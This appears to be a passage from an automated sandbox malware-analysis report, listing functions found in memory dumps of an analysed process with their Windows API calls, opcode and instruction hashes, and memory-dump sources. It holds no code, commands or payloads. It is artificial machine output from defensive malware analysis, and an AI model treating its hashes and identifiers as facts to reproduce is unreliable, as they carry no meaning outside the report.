                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 04a5afaa8be1f4f921893b958101c6685e3f31ec295b5b3b8bdd853e4b689b17
                                                    • Instruction ID: b0c6835af82f1edabbb8199ddba2c5461c9b1fb1b7aadade5743c7516fac4ca4
                                                    • Opcode Fuzzy Hash: 04a5afaa8be1f4f921893b958101c6685e3f31ec295b5b3b8bdd853e4b689b17
                                                    • Instruction Fuzzy Hash: 8E11BF72500700EFEB21DF65DC89BA6FBE8EF44721F14846AF9498B281D674A9048BB5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C0886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 027C08E5
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 52cd577c312ee38578caab5fde24f98f37b6b95213887a4f508410cf6a5e9070
                                                    • Instruction ID: 668127198ee7d0e3b6347e7176f849514333e5cd02608d3f6bc158cc1ef575f4
                                                    • Opcode Fuzzy Hash: 52cd577c312ee38578caab5fde24f98f37b6b95213887a4f508410cf6a5e9070
                                                    • Instruction Fuzzy Hash: 5411BC72400700EFEB21CF61DC85FA6FBE8EF14720F1485AEE9499A242C675A904CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEBA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01DEBA7E
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: f5fb050c206fa33f557fb7da59e8a24ff8b689bb4aabe331cff1322bbbb694aa
                                                    • Instruction ID: 31597a222c4126016d837e1a7a6b5408c6b7dd47404d06a673d298f6242c9c0f
                                                    • Opcode Fuzzy Hash: f5fb050c206fa33f557fb7da59e8a24ff8b689bb4aabe331cff1322bbbb694aa
                                                    • Instruction Fuzzy Hash: 55119072504380AFDB22CF65CC84B52FFF4EF09211F08849AE9858B662D375A418CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C12D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 027C132F
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 36abbd6c65a9af78e9beb8c067cd29f60cdd0c92564deb704bde9a8bf4270e42
                                                    • Instruction ID: 3bbe3498f93d1b7bf9ea549057d1d506edb3dc283a2e831a6029ae0f1c3e3978
                                                    • Opcode Fuzzy Hash: 36abbd6c65a9af78e9beb8c067cd29f60cdd0c92564deb704bde9a8bf4270e42
                                                    • Instruction Fuzzy Hash: 921191755093849FDB118F25DC45B96FFE4EF06220F0984EFED498B253D275A818CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEA33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    • Opcode ID: d30cf47840d5ea81271c96f49e8a59b11bef77fff9a69bc9a9d4a2422a748f1f
                                                    • Instruction ID: f569f424ade9e7db9277e59495bea805b9dac93d4ed41d3bb79c929d330b4b74
                                                    • Opcode Fuzzy Hash: d30cf47840d5ea81271c96f49e8a59b11bef77fff9a69bc9a9d4a2422a748f1f
                                                    • Instruction Fuzzy Hash: 39118F714093C09FE7128B25DC54A62BFB4DF47624F0880CBEDC48F253D265A808DB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 027C099C
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: 0fea5e0c7cad305b7ed71f8c8a054658322b7ab30dff44789b7a6db60bafe2e4
                                                    • Instruction ID: 203a0c4934aae4e3724d6c2768ac52461395b47f85b51f0ec4ac19b73aa5ffa4
                                                    • Opcode Fuzzy Hash: 0fea5e0c7cad305b7ed71f8c8a054658322b7ab30dff44789b7a6db60bafe2e4
                                                    • Instruction Fuzzy Hash: 7F119D754097C09FE7228B25DC55B92BFA4EF07324F0980DADD848B263C265A908CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEAAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01DEAB1A
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 87066c9d697d088454905f9101a5c42c1f51ac1bcdf825a490713bafdc73e1d6
                                                    • Instruction ID: 71d4bc87c4f1092dfcff1c7edc1e626ccff66e5f13ddd0a31667f2ad1e338354
                                                    • Opcode Fuzzy Hash: 87066c9d697d088454905f9101a5c42c1f51ac1bcdf825a490713bafdc73e1d6
                                                    • Instruction Fuzzy Hash: C11161B66007019FEB20DF29DC89B56FBD8EF14621F08C4AADD49CB742D674E404CA71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEAA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01DEAA71
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: ec35f9a1b8547ebb41ba3bae696fc39a97da495941f0289a6b17d5fb2533e544
                                                    • Instruction ID: 17d32756eff2dfe4fd5eb9d6cab027e1b54dc8b191827351c63dde0cd48a4570
                                                    • Opcode Fuzzy Hash: ec35f9a1b8547ebb41ba3bae696fc39a97da495941f0289a6b17d5fb2533e544
                                                    • Instruction Fuzzy Hash: 9C11E37540D7C09FD7128B25DC85B92BFB0EF07220F0980DBDD848F263D268A909C762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C07C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 027C0819
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: ee5fce1094451e12b45a827987dcc70f5c53fe3865ad1b4c24a5d820af4bf38b
                                                    • Instruction ID: f1e26edcb25485520b37b126705c4b147cde7dcc211050df5339988d1bff5920
                                                    • Opcode Fuzzy Hash: ee5fce1094451e12b45a827987dcc70f5c53fe3865ad1b4c24a5d820af4bf38b
                                                    • Instruction Fuzzy Hash: 8F018075504704EFFB209F65DC86BA6FBD8DF44720F14C09AED099A242D674A904CAE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C13AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 5d7f8c4b4fcde54aeb3abe1fb6f4d1a547e57ddf506e21ce500a29e275e53a11
                                                    • Instruction ID: 013a2da1d5e24ee55e6f6e85c0d01a9886fec4e7adb7a3d9818512f8511b6e5b
                                                    • Opcode Fuzzy Hash: 5d7f8c4b4fcde54aeb3abe1fb6f4d1a547e57ddf506e21ce500a29e275e53a11
                                                    • Instruction Fuzzy Hash: 15118B76500700DFEB20DF66DC85B66FBA4EF04320F5884AEED498B652D771E518CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEAB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01DEABC9
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 87d39d413f0a46d445d481315e7ba9c7a6c45939f35aef7c719b8264412012d2
                                                    • Instruction ID: 23fae740374428a0ead021706893f94d405e46430b381a27b11bf986abfbd2ad
                                                    • Opcode Fuzzy Hash: 87d39d413f0a46d445d481315e7ba9c7a6c45939f35aef7c719b8264412012d2
                                                    • Instruction Fuzzy Hash: 8D11C2B54093809FDB11CF65DC89B92BFE4EF02220F0980EBDD488F253D274A508CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEBA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01DEBA7E
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 3d997af8ed32a512eadabb375489b3dd842314869bcf153048404afaa171de76
                                                    • Instruction ID: 442a55dd1bf081726c272670efdfcc11ad1e8347812575db07314f6c758435e8
                                                    • Opcode Fuzzy Hash: 3d997af8ed32a512eadabb375489b3dd842314869bcf153048404afaa171de76
                                                    • Instruction Fuzzy Hash: 46118E72500700DFEF21DF55DC88B62FBE4EF08222F0884AADE898A612D371E414DBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 027C109E
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 4473d0d462e34e18787f53696a24cc860c67beaf04373ef8db5299b58ea36d4e
                                                    • Instruction ID: 2f8122b4b3e49a600decad978354fc565d36053f8d941832329f5863e00ab3f0
                                                    • Opcode Fuzzy Hash: 4473d0d462e34e18787f53696a24cc860c67beaf04373ef8db5299b58ea36d4e
                                                    • Instruction Fuzzy Hash: 39017171900600AFE310DF26DD46B66FBA8FB84A20F14816AED089B741D235B515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C0196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 027C01D0
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 736a2498bff927b81460fd83b2a4570851693e495c113deecef4b4dfa55b8ee8
                                                    • Instruction ID: 66adf62be8e354a956e042872c0e575cce60c2b7f79a5b4f6353d1231f64416c
                                                    • Opcode Fuzzy Hash: 736a2498bff927b81460fd83b2a4570851693e495c113deecef4b4dfa55b8ee8
                                                    • Instruction Fuzzy Hash: 7F015E71600744DFEB10DF6ADC8576AFBD8EB01724F1884AEDD09CB746D674E504CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEA1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01DEA23E
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: 75e247d95900d0d63c237166842593f5b9660c1ded7a551f4dd096ece3ed8bd4
                                                    • Instruction ID: b8200b37a543d1698273b7bc07bd048f085da9c537a30d3ccb2c3a1f9759f7d2
                                                    • Opcode Fuzzy Hash: 75e247d95900d0d63c237166842593f5b9660c1ded7a551f4dd096ece3ed8bd4
                                                    • Instruction Fuzzy Hash: CD018471900600AFE310DF26DD46B76FBE8FB84A20F14816AED089B741D235F515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C12FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 027C132F
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 035dda6ef8e5979898e096d8322d87fbedfc0be37fd7b2276c5e2666f49c9b22
                                                    • Instruction ID: 7cf7b3c7d672a27bccde00289d392ff963e6925aa362176e0a7337947dcb6382
                                                    • Opcode Fuzzy Hash: 035dda6ef8e5979898e096d8322d87fbedfc0be37fd7b2276c5e2666f49c9b22
                                                    • Instruction Fuzzy Hash: 75019A75500200DFEB208F25DC857A5FBA4EB04624F5884AEDC098B642D675A404CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEBAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    • Opcode ID: 5ee403aa1190a6e745bbf6e9136071a46dba5bd637f395098a3cb04e7cbcc1aa
                                                    • Instruction ID: 4a9719f2937bc130a71df77adefb88b663ca4de70c357869e1bb1bf50dfaa705
                                                    • Opcode Fuzzy Hash: 5ee403aa1190a6e745bbf6e9136071a46dba5bd637f395098a3cb04e7cbcc1aa
                                                    • Instruction Fuzzy Hash: 1D01DF75500200DFEF21DF29DC897A5FBE4EF04621F08C4ABDD498B256D675E804CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C0F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 027C0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: d79e6aa2e07efabc926018e09412185d8594b041c9eb08b835fe9a937ac5d18d
                                                    • Instruction ID: 717bcc1b8e172b3655f161fa8bccbd7988cfc810a64c7cd330b89b4344148605
                                                    • Opcode Fuzzy Hash: d79e6aa2e07efabc926018e09412185d8594b041c9eb08b835fe9a937ac5d18d
                                                    • Instruction Fuzzy Hash: FB017C71500340DFEB20DF29D885B66FB94EB01720F1884AEDD088F246D374E544CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C04B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 027C0502
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 9f0e3ebff19c0456401ee1ca820bab2122eb7251120834a1b420b67d457ca43e
                                                    • Instruction ID: bb8df4e86eea2af97103bf859e988b1b85ea918300af81d62bccfcdb13630003
                                                    • Opcode Fuzzy Hash: 9f0e3ebff19c0456401ee1ca820bab2122eb7251120834a1b420b67d457ca43e
                                                    • Instruction Fuzzy Hash: 31016271940600ABD310DF16DD46B26FBA4FB88B20F14815AED085B741D275F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEA8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01DEA94A
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: 00e6727374e62e8de55e65d59fa0c0839cc672fcdd74d6b9c9bb0ee104753cbd
                                                    • Instruction ID: 9e91b1de3774dcd731e94a333689a3b176c5d4e66f616adfc1e0c2e0cec2d608
                                                    • Opcode Fuzzy Hash: 00e6727374e62e8de55e65d59fa0c0839cc672fcdd74d6b9c9bb0ee104753cbd
                                                    • Instruction Fuzzy Hash: 0D016271940600ABD310DF16DD46B26FBA4FB88B20F14815AED085B741D275F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEAB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01DEABC9
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 211e012f554f33e3cb15cb65e4f0cbc49c8703d7e2b709f4d41540d63fd172eb
                                                    • Instruction ID: c0b69522851f311538ae649e7c4077e4f31f60591ba08c878e78776655591f84
                                                    • Opcode Fuzzy Hash: 211e012f554f33e3cb15cb65e4f0cbc49c8703d7e2b709f4d41540d63fd172eb
                                                    • Instruction Fuzzy Hash: 0601D135404740CFEB10EF59DC897A6FBE4EF04221F08C4ABCD098F202D274A404CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C1116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 027C1148
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: 16b2ef4a553f3d4fd93e8e001568bf92f8e516c9ea708b0d2f2ae0cecc8c82e5
                                                    • Instruction ID: 55e01f3b0e7f938b341e2db3a8e8f27fa742679739511264ee7c2d474c9c5072
                                                    • Opcode Fuzzy Hash: 16b2ef4a553f3d4fd93e8e001568bf92f8e516c9ea708b0d2f2ae0cecc8c82e5
                                                    • Instruction Fuzzy Hash: E3F0AF35500740DFEB20CF25D885765FBA4EF05B21F58C0EEDD494B313D679A544CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 027C099C
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: b6939006c4e26a47d527b468e24cb6e6d3b43e1f71729da5ab583b9605afc480
                                                    • Instruction ID: add6561dde94c99746864310e1046db2063124daac89375bf3b5bf4c958dbae4
                                                    • Opcode Fuzzy Hash: b6939006c4e26a47d527b468e24cb6e6d3b43e1f71729da5ab583b9605afc480
                                                    • Instruction Fuzzy Hash: 5AF0A935904740DFEB209F26D889766FBA4EF15721F18C09EDD494B316D279A508CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEA36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    • Opcode ID: 04c6b16f9d6619d6ea82a37eb3ead39259a2075b4d60b5117fba62f900d38b08
                                                    • Instruction ID: 9cb1b18310952fb11724ee322b4a0044530f1532d1059a7a44671a7a3f42e585
                                                    • Opcode Fuzzy Hash: 04c6b16f9d6619d6ea82a37eb3ead39259a2075b4d60b5117fba62f900d38b08
                                                    • Instruction Fuzzy Hash: 2CF0AF35504741DFEB20AF55D889765FBE0EF04722F18C0DADD494B312D3B5E904CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEAA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01DEAA71
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 701d419c3dfd18d23f3cb7b63c2180710948a848c65a7963b09a8a757ebc16dd
                                                    • Instruction ID: d7f8f9f0b1e931310c7f7430d48c67094c936a81ec621953a4ef827e0bf2399b
                                                    • Opcode Fuzzy Hash: 701d419c3dfd18d23f3cb7b63c2180710948a848c65a7963b09a8a757ebc16dd
                                                    • Instruction Fuzzy Hash: BAF0C231500741CFEB10DF19E989762FBD0EF04622F48C09ADD494F342D278E504CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C063A, Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE ref: 027C0640
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: aecb19a50498e01a3fae21035c0e36087a7a1263db8dcb76eb8aa665f7dc6fea
                                                    • Instruction ID: 363994319fedf25e15a2540e7c245c9a1ec42c4130bbd808d5b82b885182253f
                                                    • Opcode Fuzzy Hash: aecb19a50498e01a3fae21035c0e36087a7a1263db8dcb76eb8aa665f7dc6fea
                                                    • Instruction Fuzzy Hash: 65E04F36604215CFEB109E29E8493A5B790EB41221F1440AEDC1AD7A60D675D598DA92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEA974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01DEA9C8
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 74c94ba3571049a112d8c23e4b8f158b45f30ef73f3946393d8859b8b66131cb
                                                    • Instruction ID: 1f09a75677fb61af30d6b1da4ebddbd2e83162e3990bde404b741fb0136ef0ae
                                                    • Opcode Fuzzy Hash: 74c94ba3571049a112d8c23e4b8f158b45f30ef73f3946393d8859b8b66131cb
                                                    • Instruction Fuzzy Hash: 751191755093809FD712CB25DC89B92BFE4EF06221F0980EBED458B253D275A908CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEA996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01DEA9C8
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 328ecddbdee74427b48a9ee912adf5161aedef0b95f5d7b040cbb4efdd3695c6
                                                    • Instruction ID: b25a4adcedffeadd843a07f4d2ec7c4210339c26a795f9109d79fbac6dc00922
                                                    • Opcode Fuzzy Hash: 328ecddbdee74427b48a9ee912adf5161aedef0b95f5d7b040cbb4efdd3695c6
                                                    • Instruction Fuzzy Hash: 1701F275500741CFEB10EF29DC897A6FBD4EF04221F08C0ABDC098B242D675E904CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02B40771, Relevance: .1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2190488236.0000000002B40000.00000040.00000001.sdmp, Offset: 02B40000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9c40b243be2ff7d1046240845dc482b2bf446c3dbb5f38e9d4b0b2943415951a
                                                    • Instruction ID: 7ec4a2fa2d2e2c3430685e3cf89cbe27f736eb605671130ba9f23d71334dca67
                                                    • Opcode Fuzzy Hash: 9c40b243be2ff7d1046240845dc482b2bf446c3dbb5f38e9d4b0b2943415951a
                                                    • Instruction Fuzzy Hash: 8A21F36650E3D10FC3036B3898B66967FB19E57118B4F45DBC4C1CF2A3D619884AC763
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DE23F4, Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182969947.0000000001DE2000.00000040.00000001.sdmp, Offset: 01DE2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aae899cd33c9d53d0ce3abcd70334b7984b4f829db1fcbef4d42881d55b42bec
                                                    • Instruction ID: 7c4d717e9bc942f335117fc674b8b37768f465b3fa814a0a384a063e6981ae50
                                                    • Opcode Fuzzy Hash: aae899cd33c9d53d0ce3abcd70334b7984b4f829db1fcbef4d42881d55b42bec
                                                    • Instruction Fuzzy Hash: 07D05E79204A818FE7169B1CC1A9B953BE8AF69B05F4644F9E840CB6A3C768E581D200
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DE23BC, Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182969947.0000000001DE2000.00000040.00000001.sdmp, Offset: 01DE2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fddff02e483b279e3ef593b06950760bb1f84ab03a1b77921cae40c77db6e458
                                                    • Instruction ID: f845c5433b3bc4a32e72db07936bd4f795f2f81129b81e012a40991016212469
                                                    • Opcode Fuzzy Hash: fddff02e483b279e3ef593b06950760bb1f84ab03a1b77921cae40c77db6e458
                                                    • Instruction Fuzzy Hash: 29D05E343006818FEB15DA1CC198F5977E8AF44701F1644ECBC008B666C3A5E880CA00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions